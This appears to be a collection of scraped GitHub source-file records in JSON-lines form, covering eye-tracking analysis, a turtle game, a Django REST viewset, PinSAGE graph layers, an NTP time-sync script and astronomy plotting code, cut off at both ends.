view degrees!\n dets = get_detection_data()\n \n #dets = 
dets.query(\"scenario == 'peripheralVisionTest'\")\n dets = dets.query(\"scenario == 'swing'\")\n\n total = 0.0\n \n rng = np.linspace(0, 20, 100)[1:]\n\n for part, partdets in dets.groupby(\"participant_id\"):\n x = (partdets.target_gaze_distance.values)\n success = partdets.success.values\n fit = fit_detection(x, success)\n total -= fit.fun\n\n plt.plot(rng, fit.model(rng), color=f\"C{part}\", label=part)\n print(fit.x)\n print(\"Total logpdf\", total)\n plt.axhline(1/4, color='black', linestyle='dashed')\n plt.legend()\n plt.ylabel(\"Success probability\")\n plt.xlabel(\"Gaze error (degrees)\")\n plt.show()\n\nif __name__ == '__main__':\n #plot_detection_data()\n fit_detection_data()\n","repo_name":"ttammi/blindpursuit20","sub_path":"analysis/detection_accuracy.py","file_name":"detection_accuracy.py","file_ext":"py","file_size_in_byte":4726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"}
{"seq_id":"35157851085","text":"import turtle as t\r\nimport random as r\r\nt.speed(0)\r\n\r\nt.up()\r\nt.goto(-250,-250)\r\nt.down()\r\nfor x in range(4):\r\n t.fd(500)\r\n t.lt(90)\r\n\r\n\r\n\r\nt.up()\r\n\r\nt.goto(0,0)\r\nt.down()\r\nt.shape(\"turtle\")\r\nt.color(\"white\")\r\n\r\n\r\nte=t.Turtle()\r\nte.up()\r\nte.goto(0,200)\r\nte.down()\r\n\r\nte.shape(\"turtle\")\r\nte.color(\"red\")\r\n\r\n\r\n\r\nts=t.Turtle()\r\nts.up()\r\nts.goto(0,-200)\r\nts.down()\r\nts.shape(\"circle\")\r\nts.color(\"green\")\r\n\r\nt.bgcolor(\"orange\")\r\n\r\n\r\ndef right():\r\n t.setheading(0)\r\n\r\ndef left():\r\n t.setheading(180)\r\n\r\ndef up():\r\n t.setheading(90)\r\ndef down():\r\n t.setheading(270)\r\n\r\ndef play():\r\n\r\n t.fd(7)\r\n \r\n \r\nt.onkeypress(right,\"Right\")\r\nt.onkeypress(left,\"Left\")\r\nt.onkeypress(up,\"Up\")\r\nt.onkeypress(down,\"Down\")\r\nt.listen()\r\nt.up()\r\n\r\nplay()\r\n\r\nx=True\r\nscore=0\r\nwhile x:\r\n play()\r\n te.up()\r\n ang=te.towards(t.pos())\r\n te.setheading(ang)\r\n te.forward(4)\r\n \r\n\r\n if t.distance(ts)<=10:\r\n print(\"먹었다\")\r\n t.write(\"먹었다\")\r\n score=score+1\r\n print(score)\r\n ts_x=r.randint(-240,240)\r\n ts_y=r.randint(-240,240)\r\n ts.up()\r\n ts.goto(ts_x,ts_y)\r\n\r\n if t.distance(te)<=10:\r\n x=False\r\n print(\"잡혔다\")\r\n t.write(\"game over\"+str(score),False,\"center\",(\"\",20))\r\n\r\n","repo_name":"yoozeong/shin-yu-jeong","sub_path":"터틀런_신유정.py","file_name":"터틀런_신유정.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"}
{"seq_id":"5918721242","text":"from django.contrib.auth.models import User\nfrom django.core.exceptions import ValidationError\nfrom django.http import HttpResponseServerError\nfrom rest_framework import status\nfrom rest_framework.viewsets import ViewSet\nfrom rest_framework.response import Response\nfrom rest_framework import serializers\nfrom django.utils.timezone import make_aware\nfrom datetime import datetime\nfrom dbyapi.models import Post, DiyUser, Category, Comment\n\n\nclass PostView(ViewSet):\n \"\"\"User can see post information\"\"\"\n\n def create(self, request):\n \"\"\"Handle POST operations for post\n Returns: Response -- JSON serialized post instance\"\"\"\n\n diyuser = DiyUser.objects.get(user=request.auth.user)\n category = Category.objects.get(pk=request.data['category'])\n\n post = Post()\n post.category = category\n post.title = request.data['title']\n post.content = request.data['content']\n # field name matches update() and PostSerializer\n post.image_url = request.data['image_url']\n post.diyuser = 
diyuser\n\n try:\n post.save()\n serializer = PostSerializer(post, context={'request': request})\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n except ValidationError as ex:\n return Response({'reason': ex.message}, status=status.HTTP_400_BAD_REQUEST)\n\n def retrieve(self, request, pk=None):\n\n try:\n post = Post.objects.get(pk=pk)\n serializer = PostSerializer(post, context={'request': request})\n return Response(serializer.data)\n except Exception as ex:\n return HttpResponseServerError(ex)\n\n def list(self, request):\n \"\"\"Handle GET requests to get all posts\n Returns: Response -- JSON serialized list of posts\"\"\"\n\n posts = Post.objects.all()\n\n # if diyuser is not None:\n # posts = posts.filter(diyuser_id=diyuser)\n\n # if category is not None:\n # posts = posts.filter(category__id=category)\n\n serializer = PostSerializer(\n posts, many=True, context={'request': request})\n return Response(serializer.data)\n\n\n def update(self, request, pk=None):\n \"\"\"Handle PUT requests for a post\n Returns: Response -- Empty body with 204 status code\"\"\"\n\n diyuser = DiyUser.objects.get(pk=request.data['diyuser'])\n category = Category.objects.get(pk=request.data['category'])\n\n post = Post.objects.get(pk=pk)\n post.category = category\n post.title = request.data['title']\n post.content = request.data['content']\n post.image_url = request.data['image_url']\n post.diyuser = diyuser\n post.save()\n\n return Response({}, status=status.HTTP_204_NO_CONTENT)\n\n def destroy(self, request, pk=None):\n \"\"\"Handle DELETE requests for a single post\n Returns: Response -- 200, 404, or 500 status code\"\"\"\n\n try:\n post = Post.objects.get(pk=pk)\n post.delete()\n\n return Response({}, status=status.HTTP_204_NO_CONTENT)\n except Post.DoesNotExist as ex:\n return Response({'message': ex.args[0]},\n status=status.HTTP_404_NOT_FOUND)\n except Exception as ex:\n return Response({'message': ex.args[0]},\n status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n\n\nclass PostUserSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = User\n fields = ['first_name', 'last_name', 'email']\n\n\nclass PostDiyUserSerializer(serializers.ModelSerializer):\n\n user = PostUserSerializer(many=False)\n\n class Meta:\n model = DiyUser\n fields = ['id', 'user', 'bio', 'image_url']\n depth = 1\n\n\nclass CategorySerializer(serializers.ModelSerializer):\n\n class Meta:\n model = Category\n fields = ['id', 'label']\n\n\nclass CommentSerializer(serializers.ModelSerializer):\n \"\"\"JSON serializer for comments\n Arguments: serializers\"\"\"\n\n class Meta:\n model = Comment\n fields = ('id', 'content', 'date', 'post', 'diyuser')\n depth = 1\n\n\nclass PostSerializer(serializers.ModelSerializer):\n\n diyuser = PostDiyUserSerializer(many=False)\n category = CategorySerializer(many=False)\n comments = CommentSerializer(many=True)\n\n class Meta:\n model = Post\n fields = ('id', 'diyuser', 'title', 'category',\n 'date', 'image_url', 'content', 'comments')\n depth = 3\n","repo_name":"melodybarker/DesignedByYou","sub_path":"dbyapi/views/post.py","file_name":"post.py","file_ext":"py","file_size_in_byte":4450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"}
{"seq_id":"43456573807","text":"from Game.utils.items import collectibles\nfrom Game.utils.convert_items import convert_items\nfrom Game.utils.json_manager import JsonManager\nfrom Game.utils.menu import menu, clear\nfrom Game.utils.store import Store\n\n\nclass SaveGame:\n\n def __init__(self, 
auto_save):\n self.auto_save = auto_save\n\n @staticmethod\n def autosave(function):\n def save_game(self, *args, **kwargs):\n function(self, *args, **kwargs)\n if self.auto_save:\n self.save_game()\n\n return save_game\n\n\nclass MiniGames(SaveGame):\n\n def __init__(self, json_manager: JsonManager, name: str, data: dict):\n self.name = name\n self.coins = data['moedas']\n self.items = convert_items(data['itens'])\n self.json_manager = json_manager\n SaveGame.__init__(self, True)\n\n def menu(self):\n while True:\n options = {'jogar': self.play, 'coleção': self.collection, 'loja': self.store, 'sair': exit}\n\n options[menu(options, head=self.progress)]()\n\n def collection(self):\n for v in self.items.values():\n print(v.found)\n print(', '.join(map(str, v)), '\\n')\n\n input('Enter para voltar: ')\n clear()\n\n @SaveGame.autosave\n def store(self):\n store = Store(self.coins)\n\n for rarity, given, coins in store.box_purchases():\n if rarity:\n if given in self.items[rarity]:\n print('Item repetido!\\n')\n\n else:\n print()\n self.items[rarity].append(given)\n\n self.coins = coins\n\n @SaveGame.autosave\n def play(self):\n store = Store(self.coins)\n\n for coins in store.match_purchases():\n self.coins = coins\n\n def save_game(self):\n data = self.json_manager.read_json()\n data[self.name] = {'moedas': self.coins, 'itens': {k: list(map(str, v)) for k, v in self.items.items()}}\n\n self.json_manager.update_json(data)\n\n @property\n def progress(self):\n def _sum(d): return sum((len(v) for v in d.values()))\n return f'{self.name}\\nProgresso: {int((_sum(self.items) / _sum(collectibles)) * 100)}%\\nMoedas: {self.coins}'\n","repo_name":"Robertoskb/minigame","sub_path":"Game/utils/minigames.py","file_name":"minigames.py","file_ext":"py","file_size_in_byte":2222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"12340386167","text":"from src.star_command import feat_engineering_pipe\nfrom sklearn.preprocessing import Normalizer, OneHotEncoder, Imputer\nfrom sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer\nfrom sklearn.decomposition import TruncatedSVD, NMF\nfrom src.preprocessing.transformers_categorical import *\n\npipe_transforms = feat_engineering_pipe(\n tr_etat,\n tr_magasin,\n tr_categorie,\n tr_categorie1, tr_categorie2, tr_categorie3, tr_categorie4,\n tr_couleur\n)\n\nselect_feat = [\n (\"encoded_etat\", None),\n (\"encoded_nom_magasin\", None),\n (\"prix\", None),\n (\"nb_images\", None),\n (\"longueur_image\", None),\n (\"largeur_image\", None),\n (\"poids\", None),\n (\"encoded_categorie\", None),\n (\"encoded_sous_categorie_1\", None),\n (\"encoded_sous_categorie_2\", None),\n (\"encoded_sous_categorie_3\", None),\n (\"encoded_sous_categorie_4\", None),\n (\"description_produit\", [TfidfVectorizer(max_features=2**16,\n min_df=2, stop_words='english',\n use_idf=True),\n TruncatedSVD(2)]),\n (\"encoded_couleur\", None),\n (\"vintage\", None)\n]\n\n","repo_name":"mratsim/meilleur-data-scientist-france-2018","sub_path":"m110_feat_eng.py","file_name":"m110_feat_eng.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"22"} +{"seq_id":"38770752428","text":"from random import choice \n\ndef sommation(T: list) -> float:\n a = 0\n for nombre in T:\n a = a+nombre\n return a\n\ndef somme(L):\n return sum(L)\n\ndef test_unitaire(numerous_benchmark):\n failed = 0\n success_smb = ['🔥','✨','🌠','✅','🥇','🎖']\n fail_smb = 
['🌩','🙈','🙉','⛑','🌋','💣']\n if type(numerous_benchmark[0]) not in [list, tuple]:\n type_bench = 'multiple' \n numerous_benchmark = (numerous_benchmark, )\n\n for benchmark in numerous_benchmark:\n print(f\">>> Testing function ** {benchmark[0].split('(')[0].upper()} **\")\n \n for k, test in enumerate(benchmark, 1):\n if eval(test):\n print(f'Test {k} passed: {test} ')\n else:\n print(f'Test {k} failed: {test} ')\n failed += 1\n\n if not failed :\n print(f\"Well done, you passed all the tests {choice(success_smb)}\")\n else :\n if failed == 1 : msg = f\"{failed} test failed. \"\n else : msg = f\"{failed} tests failed. \"\n print(msg + f\"Go back over your code {choice(fail_smb)}\")\n\nb1 = ['somme([]) == None', 'somme([1]) == 1', 'somme([1,2]) == 3', 'somme([-1,1]) == 0']\nb2 = ['somme([]) == None', 'somme([1]) == 1', 'somme([1,2]) == 3', 'somme([-1,1]) == 0']\nbenchmark = b1\n\ntest_unitaire(benchmark)","repo_name":"dfauchard1/coursNSI1.github.io","sub_path":"test_unit.py","file_name":"test_unit.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"4716221383","text":"# -*- coding: utf-8 -*-\n# @Author: Jie\n# @Date: 2017-06-15 14:23:06\n# @Last Modified by: Jie Yang, Contact: jieynlp@gmail.com\n# @Last Modified time: 2019-02-14 12:23:52\nfrom __future__ import print_function\nfrom __future__ import absolute_import\nimport sys\nimport numpy as np\nfrom itertools import groupby\n\ndef normalize_word(word):\n new_word = \"\"\n for char in word:\n if char.isdigit():\n new_word += '0'\n else:\n new_word += char\n return new_word\n\n\ndef read_instance(input_file, word_alphabet, char_alphabet, feature_alphabets, label_alphabet, number_normalized, max_sent_length, sentence_classification=False, split_token='\\t', char_padding_size=-1, char_padding_symbol = ''):\n feature_num = len(feature_alphabets)\n in_lines = open(input_file,'r', encoding=\"utf8\").readlines()\n instance_texts = []\n instance_Ids = []\n words = []\n labels = []\n word_Ids = []\n label_Ids = []\n doc_id = \"\"\n # else:\n ### for sequence labeling data format i.e. 
CoNLL 2003\n for line in in_lines:\n if not doc_id: \n doc_id = line.strip()\n continue\n if len(line) > 2:\n pairs = line.strip().split()\n word = pairs[0]\n if sys.version_info[0] < 3:\n word = word.decode('utf-8')\n words.append(word)\n if number_normalized:\n word = normalize_word(word)\n label = pairs[-1]\n labels.append(label)\n word_Ids.append(word_alphabet.get_index(word))\n label_Ids.append(label_alphabet.get_index(label))\n else:\n if (len(words) > 0) and ((max_sent_length < 0) or (len(words) < max_sent_length)) :\n # get sent_word_Ids_list (split with \".\")\n period_id = word_alphabet.get_index(\".\")\n sent_word_Ids_list = []\n idx = 0\n sent_word_Ids = []\n while idx <= len(word_Ids) - 1:\n sent_word_Ids.append(word_Ids[idx])\n if word_Ids[idx] == period_id:\n sent_word_Ids_list.append(sent_word_Ids)\n sent_word_Ids = []\n idx += 1\n if sent_word_Ids:\n sent_word_Ids_list.append(sent_word_Ids)\n\n instance_texts.append([words, labels, doc_id])\n instance_Ids.append([word_Ids, sent_word_Ids_list, label_Ids])\n # import ipdb; ipdb.set_trace()\n\n words = []\n labels = []\n word_Ids = []\n label_Ids = []\n doc_id = \"\"\n if (len(words) > 0) and ((max_sent_length < 0) or (len(words) < max_sent_length)) :\n instance_texts.append([words, labels, doc_id])\n # instance_Ids.append([word_Ids, label_Ids])\n instance_Ids.append([word_Ids, sent_word_Ids_list, label_Ids])\n words = []\n labels = []\n word_Ids = []\n label_Ids = []\n doc_id = \"\"\n return instance_texts, instance_Ids\n\n\ndef build_pretrain_embedding(embedding_path, word_alphabet, embedd_dim=100, norm=True):\n embedd_dict = dict()\n if embedding_path != None:\n embedd_dict, embedd_dim = load_pretrain_emb(embedding_path)\n alphabet_size = word_alphabet.size()\n scale = np.sqrt(3.0 / embedd_dim)\n pretrain_emb = np.empty([word_alphabet.size(), embedd_dim])\n perfect_match = 0\n case_match = 0\n not_match = 0\n for word, index in word_alphabet.iteritems():\n if word in embedd_dict:\n if norm:\n pretrain_emb[index,:] = norm2one(embedd_dict[word])\n else:\n pretrain_emb[index,:] = embedd_dict[word]\n perfect_match += 1\n elif word.lower() in embedd_dict:\n if norm:\n pretrain_emb[index,:] = norm2one(embedd_dict[word.lower()])\n else:\n pretrain_emb[index,:] = embedd_dict[word.lower()]\n case_match += 1\n else:\n pretrain_emb[index,:] = np.random.uniform(-scale, scale, [1, embedd_dim])\n not_match += 1\n pretrained_size = len(embedd_dict)\n print(\"Embedding:\\n pretrain word:%s, prefect match:%s, case_match:%s, oov:%s, oov%%:%s\"%(pretrained_size, perfect_match, case_match, not_match, (not_match+0.)/alphabet_size))\n return pretrain_emb, embedd_dim\n\ndef norm2one(vec):\n root_sum_square = np.sqrt(np.sum(np.square(vec)))\n return vec/root_sum_square\n\ndef load_pretrain_emb(embedding_path):\n embedd_dim = -1\n embedd_dict = dict()\n with open(embedding_path, 'r', encoding=\"utf8\") as file:\n for line in file:\n line = line.strip()\n if len(line) == 0:\n continue\n tokens = line.split()\n if embedd_dim < 0:\n embedd_dim = len(tokens) - 1\n elif embedd_dim + 1 != len(tokens):\n ## ignore illegal embedding line\n continue\n # assert (embedd_dim + 1 == len(tokens))\n embedd = np.empty([1, embedd_dim])\n embedd[:] = tokens[1:]\n if sys.version_info[0] < 3:\n first_col = tokens[0].decode('utf-8')\n else:\n first_col = tokens[0]\n embedd_dict[first_col] = embedd\n return embedd_dict, embedd_dim\n\nif __name__ == '__main__':\n a = np.arange(9.0)\n print(a)\n 
print(norm2one(a))\n","repo_name":"xinyadu/doc_event_role","sub_path":"model/code/utils/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":5440,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"22"} +{"seq_id":"41313197947","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nimport dgl\nimport dgl.function as fn\nimport dgl.nn.pytorch as dglnn\n\n\ndef disable_grad(module):\n for param in module.parameters():\n param.requires_grad = False\n\n\ndef _init_input_modules(g, ntype, textset, hidden_dims):\n '''\n Set up an independent embedding for each item feature; values are looked up from the raw feature values in g\n ----------\n ntype: only features of this node type are considered (the item node type name is passed in here)\n ----------\n module_dict[f_name]:\n if f is an int64 feature: assumed to be a label-encoded categorical feature, mapped to a [C,h] embedding\n if f is a float feature: mapped to a Linear layer; the input is [B,d] by default and becomes [B,h] after the Linear\n '''\n # We initialize the linear projections of each input feature ``x`` as\n # follows:\n # * If ``x`` is a scalar integral feature, we assume that ``x`` is a categorical\n # feature, and assume the range of ``x`` is 0..max(x).\n # * If ``x`` is a float one-dimensional feature, we assume that ``x`` is a\n # numeric vector.\n # * If ``x`` is a field of a textset, we process it as bag of words.\n module_dict = nn.ModuleDict()\n\n for column, data in g.nodes[ntype].data.items(): # all features of item-type nodes. data holds every node's values for this feature (set on train_g during preprocessing)\n if column == dgl.NID:\n continue\n if data.dtype == torch.float32:\n assert data.ndim == 2\n m = nn.Linear(data.shape[1], hidden_dims) # treated as a continuous feature, mapped to a Linear layer\n nn.init.xavier_uniform_(m.weight)\n nn.init.constant_(m.bias, 0)\n module_dict[column] = m\n elif data.dtype == torch.int64: # treated as a categorical feature, mapped to a [C,h] embedding\n assert data.ndim == 1\n m = nn.Embedding(data.max() + 2, hidden_dims, padding_idx=-1)\n nn.init.xavier_uniform_(m.weight)\n module_dict[column] = m\n\n if textset is not None:\n for column, field in textset.items():\n textlist, vocab, pad_var, batch_first = field\n module_dict[column] = BagOfWords(vocab, hidden_dims)\n\n return module_dict\n\n\nclass BagOfWords(nn.Module):\n def __init__(self, vocab, hidden_dims):\n super().__init__()\n\n self.emb = nn.Embedding(\n len(vocab.get_itos()),\n hidden_dims,\n padding_idx=vocab.get_stoi()[\"\"],\n )\n nn.init.xavier_uniform_(self.emb.weight)\n\n def forward(self, x, length):\n return self.emb(x).sum(1) / length.unsqueeze(1).float()\n\n\nclass LinearProjector(nn.Module):\n \"\"\"\n Projects each input feature of the graph linearly and sums them up\n \"\"\"\n\n def __init__(self, full_graph, ntype, textset, hidden_dims):\n '''\n Initialize a projection layer for every feature in g, producing module_dict[f_name]\n each int64 feature f: assumed label-encoded categorical, initialized as a [C,h] embedding\n each float feature f: assumed to be a [B,d] continuous feature, initialized as a (d,h) Linear layer\n -----\n ntype: only features of this node type are considered (item features)\n '''\n super().__init__()\n\n self.ntype = ntype\n self.inputs = _init_input_modules(\n full_graph, ntype, textset, hidden_dims # module_dict[f_name]. 
the projection layer for each feature\n )\n\n def forward(self, ndata):\n '''\n ndata: raw features of the corresponding nodes in some block, a dict: {f_name:tensor[]}\n ----------\n each feature is projected to an h-dim vector, then all of them are summed directly\n '''\n projections = []\n for feature, data in ndata.items(): # each feature of the nodes in this block. data: the feature values on each node, a tensor.\n if feature == dgl.NID or feature.endswith(\"__len\"):\n # This is an additional feature indicating the length of the ``feature``\n # column; we shouldn't process this.\n continue\n\n module = self.inputs[feature] # the input projection layer for this feature\n if isinstance(module, BagOfWords):\n # Textual feature; find the length and pass it to the textual module.\n length = ndata[feature + \"__len\"]\n result = module(data, length)\n else:\n result = module(data) # raw feature passed through embedding/Linear: (B,) -> (B,h)\n projections.append(result)\n\n return torch.stack(projections, 1).sum(1) # simply sum the per-feature vectors stack: (B,|F|,h) ->sum (B,h)\n\n\nclass WeightedSAGEConv(nn.Module):\n '''\n One conv layer: aggregates the neighbors at this hop\n '''\n def __init__(self, input_dims, hidden_dims, output_dims, act=F.relu):\n super().__init__()\n\n self.act = act\n self.Q = nn.Linear(input_dims, hidden_dims)\n self.W = nn.Linear(input_dims + hidden_dims, output_dims)\n self.reset_parameters()\n self.dropout = nn.Dropout(0.5)\n\n def reset_parameters(self):\n gain = nn.init.calculate_gain(\"relu\")\n nn.init.xavier_uniform_(self.Q.weight, gain=gain)\n nn.init.xavier_uniform_(self.W.weight, gain=gain)\n nn.init.constant_(self.Q.bias, 0)\n nn.init.constant_(self.W.bias, 0)\n\n def forward(self, g, h, weights):\n \"\"\"\n g: one block, containing only this hop's nodes and the next-hop neighbors. Neighbor nodes point to the seeds; when the block is built, the source nodes include the dst nodes.\n h: the vector of every node in this block, produced by the previous layer\n weights: weights of the neighbor-to-target edges in this block, i.e. each neighbor's importance from neighbor sampling. Raw values, tensor(|E|,1)\n returns: the new representation z of this block's target nodes (B,h)\n \"\"\"\n h_src, h_dst = h # h_src: current embeddings of the block's source nodes.\n # h_dst: current embeddings of the block's target nodes, contained within h_src\n with g.local_scope():\n # transform the source node h_v itself:\n # h_v=Relu(Q*h_v+q), still h-dim. Acts like a map step; stored as source-node feature 'n'\n g.srcdata[\"n\"] = self.act(self.Q(self.dropout(h_src)))\n\n # for each target node, aggregate its neighbors weighted by the neighbor weights. update node features with DGL's built-in message-passing API\n # h_u= sum(w*h_v), i.e. a weighted reduce for every dst node\n g.edata[\"w\"] = weights.float() # neighbor weights stored as an edge feature\n g.update_all(fn.u_mul_e(\"n\", \"w\", \"m\"), # on each edge, the source node's feature 'n' (dst nodes included) is multiplied by the edge weight 'w' to produce message \"m\" (stored on that edge as a new edge feature).\n fn.sum(\"m\", \"n\")) # the target node's feature 'n' is updated to the weighted aggregation of all neighbors' h_v: h_u= sum(w*h_v) (each dst node reduces all incoming messages m)\n n = g.dstdata[\"n\"] # pull out the target nodes' new representation, ready for normalization; n_u in the paper [B,h]\n\n g.update_all(fn.copy_e(\"w\", \"m\"), fn.sum(\"m\", \"ws\")) # each dst node sums all incoming edge weights, used to normalize n_u (the raw w are visit counts, unnormalized)\n ws = g.dstdata[\"ws\"].unsqueeze(1).clamp(min=1) # the per-edge messages m (from w) are reduced into the dst node's 'ws' field as a node feature (ws)\n\n # add the node's own initial embed: z_u= Relu(W * (concat[n_u,h_u]) + b)\n z = self.act(self.W(self.dropout(torch.cat([n / ws, h_dst], 1)))) # [B,h] after concatenating with the node itself, mapped back to h through W\n z_norm = z.norm(2, 1, keepdim=True)\n z_norm = torch.where(\n z_norm == 0, torch.tensor(1.0).to(z_norm), z_norm\n )\n z = z / z_norm # normalize; this gives the new representation of the block's target nodes\n return z\n\n\nclass SAGENet(nn.Module):\n def __init__(self, hidden_dims, n_layers):\n \"\"\"\n Core model: holds every conv layer\n \"\"\"\n super().__init__()\n\n self.convs = nn.ModuleList()\n for _ in range(n_layers):\n self.convs.append(\n WeightedSAGEConv(hidden_dims, hidden_dims, hidden_dims)\n )\n\n def forward(self, blocks, h):\n '''\n Args:\n blocks: the pre-sampled nodes of each hop\n each block subgraph contains only this hop's nodes and the next hop's neighbors; every neighbor points to its seeds:\n blocks[-1]: the initial B items are the seeds; each node samples n neighbors, giving a bipartite block with only the seeds and their 1-hop neighbors.\n blocks[-2]: the 1-hop neighbors from the previous round become the new seeds and are sampled again, giving a bipartite block with only the 1- and 2-hop neighbors\n ...\n blocks[0]: holds the subgraph of the outermost hop; aggregation starts from those outermost neighbors\n h: initial embeddings obtained by aggregating the raw features of the source nodes of the outermost block. Each block's source nodes include the dst nodes (placed in the first |dst| positions)\n Returns:\n the representation of the input nodes in blocks after several rounds of conv aggregation: (B,h)\n '''\n for layer, block in zip(self.convs, blocks): # one conv layer per block\n h_dst = h[: block.num_nodes(\"DST/\" + block.ntypes[0])] # initial vectors of this block's target nodes (the first |dst| entries of the block's source nodes)\n h = layer(block, (h, h_dst), block.edata[\"weights\"]) # the new representation z of this block's target nodes, assigned back to h\n # this block's target nodes are the next block's source nodes; z becomes the next block's src and aggregates toward the upper layers.\n return h # representation of the original input nodes after aggregating n hops of neighbors: (B,h)\n\n\nclass ItemToItemScorer(nn.Module):\n def __init__(self, full_graph, ntype):\n '''\n Parameters\n ----------\n full_graph: the full graph\n ntype: only item-type nodes are considered; the subgraph is a homogeneous graph of item nodes only.\n '''\n super().__init__()\n\n n_nodes = full_graph.num_nodes(ntype) # total number of item nodes in g\n self.bias = nn.Parameter(torch.zeros(n_nodes, 1)) # one learnable bias per node\n\n def _add_bias(self, edges:dgl.udf.EdgeBatch): # user-defined message function.\n \"edges is essentially a batch of edges; the src, dst and data attributes give access to the u/v node features and the edge features\"\n bias_src = self.bias[edges.src[dgl.NID]] # bias of the source node\n bias_dst = self.bias[edges.dst[dgl.NID]] # bias of the target node\n return {\"s\": edges.data[\"s\"] + bias_src + bias_dst} # the final head->tail edge score, with the learned per-node biases added\n\n def forward(self, item_item_graph, h):\n \"\"\"\n item_item_graph : pos_graph/neg_graph. 
a subgraph containing only the B head->tail edges. After compacting, each subgraph also contains the other subgraph's nodes, 3B nodes in total\n h : heads, tails, neg_tails, 3B nodes, the final representation of each node after the network. (3B,h)\n -----\n Returns:\n pair_score : for the B (head->tail) pairs in this subgraph, the pairwise similarity obtained from the inner products of the final representations h (B,1)\n \"\"\"\n with item_item_graph.local_scope():\n item_item_graph.ndata[\"h\"] = h # set h as the feature of the subgraph's nodes.\n item_item_graph.apply_edges(fn.u_dot_v(\"h\", \"h\", \"s\")) # use the message-passing API to compute the edge feature 's' for head and tail (the inner product of the head and tail vectors)\n item_item_graph.apply_edges(self._add_bias) # add a learnable bias to this score to get each pair's final score (TODO: optional)\n pair_score = item_item_graph.edata[\"s\"]\n return pair_score # similarities of the B pairs in this subgraph from the inner products\n","repo_name":"Xuweijia-buaa/dgl","sub_path":"examples/pytorch/pinsage/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":12003,"program_lang":"python","lang":"zh","doc_type":"code","dataset":"github-code","pt":"22"} +{"seq_id":"37002378790","text":"#Program for system time clock sync\n\n\"\"\"\nRequires Internet Connection\n\nReference\nhttps://pypi.org/project/ntplib/\n\n\"\"\"\n\n\"\"\"\nDevansh Shukla\n\n\"\"\"\n\nimport os\nimport ntplib # pip3 install ntplib\nfrom datetime import datetime, timezone\n\ndef sys_sync_():\n\n try:\n\n print(\"Connecting to NTP Server\")\n \n os.system(\"sudo ntpdate -d -u -q time.nplindia.org\")\n\n print(\"System Time Synced\\n\")\n\n except:\n\n print(\"Requires Internet Connection\")\n\n exit(0)\n\ndef check_sync():\n\n try:\n\n #print(\"\\n Connecting to NTP Server\")\n c = ntplib.NTPClient()\n # Provide the respective ntp server ip in below function\n response = c.request('time.nplindia.org', version=3)\n #print(response.offset) \n #print(ntplib.leap_to_text(response.leap))\n\n server_time = datetime.fromtimestamp(response.tx_time) \n current_time = datetime.now()\n\n t1 = server_time.timestamp()\n \n #print(t1)\n t2 = current_time.timestamp()\n #print(t2)\n\n global __t__\n __t__ = t2 - t1 # System Time - Server Time\n\n #print(\"Difference in Sync is \" , __t__ , \"s\")\n\n except:\n\n print(\"Requires Internet Connection\")\n\n exit(0)\n\n__t__ = 0.5\n\n#while(abs(__t__) >= 0.5):\n \nsys_sync_()\n\ncheck_sync()\n\nprint(\"Difference in Sync is \" , __t__ , \"s \" , \"(SysT - ServerT)\\n\")\n\ncorrected_time = datetime.now().timestamp() - __t__\n\n\n","repo_name":"devanshshukla99/SAS","sub_path":"sys_sync_ntpdate.py","file_name":"sys_sync_ntpdate.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"35498730749","text":"import copy\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\n\n\nfrom lenstronomy.Util.package_util import exporter\n\nexport, __all__ = exporter()\n\n\n@export\ndef plot_chain_list(chain_list, index=0, num_average=100):\n \"\"\"Plots the output of a chain of samples (MCMC or PSO) with some diagnostics of\n convergence. 
This routine is an example and more tests might be appropriate to\n analyse a specific chain.\n\n :param chain_list: list of chains with arguments [type string, samples etc...]\n :param index: index of chain to be plotted\n :param num_average: in chains, number of steps to average over in plotting diagnostics\n :return: plotting instance figure, axes (potentially multiple)\n \"\"\"\n chain_i = chain_list[index]\n chain_type = chain_i[0]\n if chain_type == \"PSO\":\n chain, param = chain_i[1:]\n f, axes = plot_chain(chain, param)\n elif chain_type in [\"MCMC\", \"emcee\", \"zeus\"]:\n samples, param, dist = chain_i[1:]\n f, ax = plt.subplots(1, 1, figsize=(6, 6))\n axes = plot_mcmc_behaviour(ax, samples, param, dist, num_average=num_average)\n elif chain_type in [\"dynesty\", \"dyPolyChord\", \"MultiNest\"]:\n samples, param, dist = chain_i[1:4]\n f, ax = plt.subplots(1, 1, figsize=(6, 6))\n axes = plot_mcmc_behaviour(ax, samples, param, dist, num_average=num_average)\n else:\n raise ValueError(\"chain_type %s not supported for plotting\" % chain_type)\n return f, axes\n\n\n@export\ndef plot_chain(chain, param_list):\n chi2_list, pos_list, vel_list = chain\n\n f, axes = plt.subplots(1, 3, figsize=(18, 6))\n ax = axes[0]\n ax.plot(np.log10(-np.array(chi2_list)))\n ax.set_title(\"-logL\")\n\n ax = axes[1]\n pos = np.array(pos_list)\n vel = np.array(vel_list)\n n_iter = len(pos)\n plt.figure()\n for i in range(0, len(pos[0])):\n ax.plot(\n (pos[:, i] - pos[n_iter - 1, i]) / (pos[n_iter - 1, i] + 1),\n label=param_list[i],\n )\n ax.set_title(\"particle position\")\n ax.legend()\n\n ax = axes[2]\n for i in range(0, len(vel[0])):\n ax.plot(vel[:, i] / (pos[n_iter - 1, i] + 1), label=param_list[i])\n 